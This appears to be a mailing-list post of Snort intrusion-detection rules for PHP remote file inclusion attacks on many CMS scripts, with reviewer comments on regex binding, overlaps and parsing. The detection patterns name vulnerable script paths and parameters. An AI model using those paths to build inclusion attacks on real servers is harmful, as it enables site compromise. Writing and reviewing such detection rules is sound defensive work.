# normalised URI. Percent-encoded spellings of the parameter name are
# presumably not covered; confirm, and consider uricontent plus /Ui for
# consistency. The pcre also lacks the \s* after "=" and the trailing \/.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Plume CMS prepend.php Remote File Inclusion
attempt"; flow:to_server,established; uricontent:"/prepend.php";
nocase; content:"_px_config[manager_path]="; nocase;
pcre:"/_px_config\x5bmanager_path\x5d=(https?|php|ftps?)\:/i";
classtype:web-application-attack; reference:cve,CVE-2006-0725;
reference:bugtraq,16662; reference:nessus,20972; sid:2002815; rev:4;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Portail Includes.php remote file include";
flow:established,to_server; uricontent:"/includes/includes.php";
nocase; pcre:"/site_path=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22361; classtype:web-application-attack;
sid:2003371; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Simple PHP Script Gallery Remote Inclusion
index.php gallery"; flow:established,to_server;
uricontent:"/index.php?"; nocase; uricontent:"gallery="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2679;
reference:url,www.securityfocus.com/bid/23534; sid:2003746; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TopTree Remote Inclusion Attempt --
tpl_message.php right_file"; flow:established,to_server;
uricontent:"/templates/default/tpl_message.php?"; nocase;
uricontent:"right_file="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2544;
reference:url,www.milw0rm.com/exploits/3854; sid:2003669; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Tropicalm Remote Inclusion Attempt --
dosearch.php RESPATH"; flow:established,to_server;
uricontent:"/dosearch.php?"; nocase; uricontent:"RESPATH="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2530;
reference:url,www.milw0rm.com/exploits/3865; sid:2003678; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
payflow_pro.php abs_path"; flow:established,to_server;
uricontent:"/include/payment/payflow_pro.php?"; nocase;
uricontent:"abs_path="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003687; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
global.php abs_path"; flow:established,to_server;
uricontent:"/global.php?"; nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003688; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
libsecure.php abs_path"; flow:established,to_server;
uricontent:"/libsecure.php?"; nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003689; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB VM Watermark Remote Inclusion Attempt --
watermark.php GALLERY_BASEDIR"; flow:established,to_server;
uricontent:"/watermark.php?"; nocase; uricontent:"GALLERY_BASEDIR=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2575;
reference:url,www.milw0rm.com/exploits/3857; sid:2003692; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP VWar Remote File Inclusion
get_header.php"; flow:established,to_server;
uricontent:"/get_header.php"; nocase;
pcre:"/vwar_root=\s*(ftps?|php|https?)\:\//Ui";
reference:url,www.milw0rm.com/exploits/1632; reference:cve,2006-1636;
reference:bugtraq,17358; classtype:web-application-attack;
sid:2002899; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP VWar Remote File Inclusion
functions_install.php"; flow:established,to_server;
uricontent:"/functions_install.php"; nocase;
pcre:"/vwar_root=\s*(ftps?|php|https?)\:\//Ui";
reference:cve,2006-1503; reference:bugtraq,17290;
classtype:web-application-attack; sid:2002902; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Versado CMS Remote Inclusion Attempt --
ajax_listado.php urlModulo"; flow:established,to_server;
uricontent:"/includes/ajax_listado.php?"; nocase;
uricontent:"urlModulo="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2541;
reference:url,www.milw0rm.com/exploits/3847; sid:2003671; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wikivi5 Remote Inclusion Attempt -- show.php
sous_rep"; flow:established,to_server;
uricontent:"/handlers/page/show.php?"; nocase; uricontent:"sous_rep=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2570;
reference:url,www.milw0rm.com/exploits/3863; sid:2003696; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wordpress Remote Inclusion Attempt --
wptable-button.php wpPATH"; flow:established,to_server;
uricontent:"/js/wptable-button.php?"; nocase; uricontent:"wpPATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2484;
reference:url,www.milw0rm.com/exploits/3824; sid:2003685; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wordpress Remote Inclusion Attempt --
wordtube-button.php wpPATH"; flow:established,to_server;
uricontent:"/wordtube-button.php?"; nocase; uricontent:"wpPATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2481;
reference:url,www.milw0rm.com/exploits/3825; sid:2003686; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB iPhotoAlbum header.php remote file include";
flow:established,to_server; uricontent:"/header.php?"; nocase;
pcre:"/set_menu=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,23189; classtype:web-application-attack;
sid:2003517; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Yaap Remote Inclusion Attempt -- common.php
root_path"; flow:established,to_server;
uricontent:"/includes/common.php?"; nocase; uricontent:"root_path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2664;
reference:url,www.milw0rm.com/exploits/3908; sid:2003739; rev:3;)
# gnuedu ETCDIR remote file inclusion attempts: nine rules, one per script,
# all citing CVE-2007-2609 and the same reference URL. Each fires on an
# established client-to-server flow whose normalized URI contains the script
# path and "ETCDIR=" (case-insensitive) and, anywhere in the URI, "=" followed
# by optional whitespace and http(s):/, ftp(s):/ or php:/.
# NOTE(review): in every rule the pcre is independent of the ETCDIR match, so
# the URL scheme may belong to another parameter. Binding it as
# /ETCDIR=\s*(https?|ftps?|php)\:\//Ui would make each rule say what its
# message claims.
# NOTE(review): the rules are mail-wrapped as archived; rejoin each onto a
# single line (or add trailing backslashes) before loading.

# /libs/lom.php (sid 2003718). Shares its msg text with sid 2003747 below.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom.php
ETCDIR"; flow:established,to_server; uricontent:"/libs/lom.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003718; rev:3;)
# lom_update.php in any directory (sid 2003719).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
lom_update.php ETCDIR"; flow:established,to_server;
uricontent:"/lom_update.php?"; nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003719; rev:3;)
# /scripts/check-lom.php (sid 2003720).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
check-lom.php ETCDIR"; flow:established,to_server;
uricontent:"/scripts/check-lom.php?"; nocase; uricontent:"ETCDIR=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003720; rev:3;)
# /scripts/weigh_keywords.php (sid 2003721).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
weigh_keywords.php ETCDIR"; flow:established,to_server;
uricontent:"/scripts/weigh_keywords.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003721; rev:3;)
# logout.php (sid 2003722). This and the next four script names are generic;
# only the "ETCDIR=" match narrows these rules to gnuedu-style requests.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- logout.php
ETCDIR"; flow:established,to_server; uricontent:"/logout.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003722; rev:3;)
# help.php (sid 2003723).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- help.php
ETCDIR"; flow:established,to_server; uricontent:"/help.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003723; rev:3;)
# index.php (sid 2003724).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- index.php
ETCDIR"; flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003724; rev:3;)
# login.php (sid 2003725).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- login.php
ETCDIR"; flow:established,to_server; uricontent:"/login.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003725; rev:3;)
# /web/lom.php (sid 2003747). NOTE(review): the msg is identical to that of
# sid 2003718 (/libs/lom.php), so the two alerts can only be told apart by
# SID; adding the directory to the msg would help triage.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom.php
ETCDIR"; flow:established,to_server; uricontent:"/web/lom.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003747; rev:3;)
# MXBB faq.php remote file inclusion attempt (CVE-2007-2493 per the reference
# below). Fires when the normalized URI contains "/faq.php?",
# "module_root_path=" and "cmd=" (all case-insensitive) and, anywhere in the
# URI, "=" followed by optional whitespace and http(s):/, ftp(s):/ or php:/.
# NOTE(review): "cmd=" is a required match, so an inclusion request that
# carries module_root_path= but no cmd parameter does not alert. If the
# intent is to detect the inclusion itself rather than one particular
# request shape, that option is a candidate for removal - confirm against
# the advisory before changing it.
# NOTE(review): the pcre is not bound to module_root_path; consider
# /module_root_path=\s*(https?|ftps?|php)\:\//Ui.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB MXBB Remote Inclusion Attempt -- faq.php
module_root_path"; flow:established,to_server; uricontent:"/faq.php?";
nocase; uricontent:"module_root_path="; nocase; uricontent:"cmd=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2493;
reference:url,www.milw0rm.com/exploits/3833; sid:2003684; rev:3;)
# pfa CMS remote file inclusion attempts: three rules for the abs_path
# parameter (CVE-2007-2559) and one for repinc (CVE-2007-2558), per the
# references below. Each fires when the normalized URI contains the script
# name and the parameter name (case-insensitive) and, anywhere in the URI,
# "=" followed by optional whitespace and http(s):/, ftp(s):/ or php:/.
# NOTE(review): the pcre is not tied to the named parameter in any of these
# rules, and "/index.php?" is a very common script name, so the parameter
# match carries most of the specificity. Binding the pcre to abs_path= or
# repinc= respectively would reduce false positives.

# index.php with abs_path (sid 2003698).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion index.php abs_path";
flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"abs_path="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003698; rev:3;)
# checkout.php with abs_path (sid 2003699).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion checkout.php
abs_path"; flow:established,to_server; uricontent:"/checkout.php?";
nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003699; rev:3;)
# libsecure.php with abs_path (sid 2003700).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion libsecure.php
abs_path"; flow:established,to_server; uricontent:"/libsecure.php?";
nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003700; rev:3;)
# index.php with repinc (sid 2003701); separate CVE and advisory from the
# three abs_path rules above.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion index.php repinc";
flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"repinc="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2558;
reference:url,www.securityfocus.com/archive/1/archive/1/467827/100/0/threaded;
sid:2003701; rev:3;)
# Workbench Survival Guide remote file inclusion attempt (CVE-2007-2542 per
# the reference below). Fires when the normalized URI contains "/header.php?"
# and "path=" (case-insensitive) and, anywhere in the URI, "=" followed by
# optional whitespace and http(s):/, ftp(s):/ or php:/.
# NOTE(review): the msg names "headerfile.php" but the rule matches
# "/header.php?"; one of the two looks wrong - confirm the script name
# against the advisory.
# NOTE(review): uricontent is a substring match, so "path=" is also satisfied
# by longer parameter names that end in "path" (abs_path=, root_path=, ...),
# and "/header.php?" is the same path the iPhotoAlbum rule (sid 2003517)
# keys on. Expect this rule to overlap with other inclusion rules; binding
# the pcre as /[?&]path=\s*(https?|ftps?|php)\:\//Ui would narrow it.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Workbench Survival Guide Remote Inclusion
Attempt -- headerfile.php path"; flow:established,to_server;
uricontent:"/header.php?"; nocase; uricontent:"path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2542;
reference:url,www.milw0rm.com/exploits/3848; sid:2003670; rev:3;)
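# Generic PHP remote file inclusion rule for the php: stream wrapper.
# Fires on an established client-to-server flow whose normalized URI contains
# ".php" and in which a parameter whose name ends in one of the listed words
# (path, page, file, ... or a one-letter array such as a[x]) is assigned a
# value starting with "php:/".
#
# Changes from the version as posted:
#  - The pcre ended in "php?", i.e. "ph" plus an optional "p" with no colon,
#    so any value beginning with "ph" (page=photos, name=phil, id=phone...)
#    alerted. It now requires "php:/", the same scheme test the other rules
#    in this post use.
#  - uricontent:"php" was dropped: every URI containing ".php" already
#    contains "php", so the option added cost but no selectivity.
#  - Lines are joined with trailing backslashes so the rule parses as
#    one rule.
#
# NOTE(review): "sid:xx" is the author's placeholder and is not a valid SID.
# Assign a numeric SID from your local range (1000000 and above) before
# loading.
# NOTE(review): this rule covers only the php: wrapper; presumably a sibling
# rule covers http/ftp values for the same parameter list - verify.
# NOTE(review): the array alternative uses a greedy ".*" inside the brackets;
# it is bounded by the URI length but is the most expensive part of the
# expression. The parameter-name alternatives are suffix matches by design
# (no left anchor), so short ones such as "id" and "rf" match many names.
# Network detection complements, and does not replace, disabling remote
# includes in php.ini (allow_url_fopen / allow_url_include).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB PHP Remote File Inclusion (monster list php)"; \
flow:established,to_server; uricontent:".php"; nocase; \
pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*php\:\//Ui"; \
reference:url,www.sans.org/top20/; classtype:web-application-attack; \
sid:xx; rev:1;)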

--
Jamie Riden, CISSP / jamesr at ...3216... / jamie at ...3294...
UK Honeynet Project: http://www.ukhoneynet.org/


-- 
Jamie Riden, CISSP / jamesr at ...3216... / jamie at ...3294...
UK Honeynet Project: http://www.ukhoneynet.org/



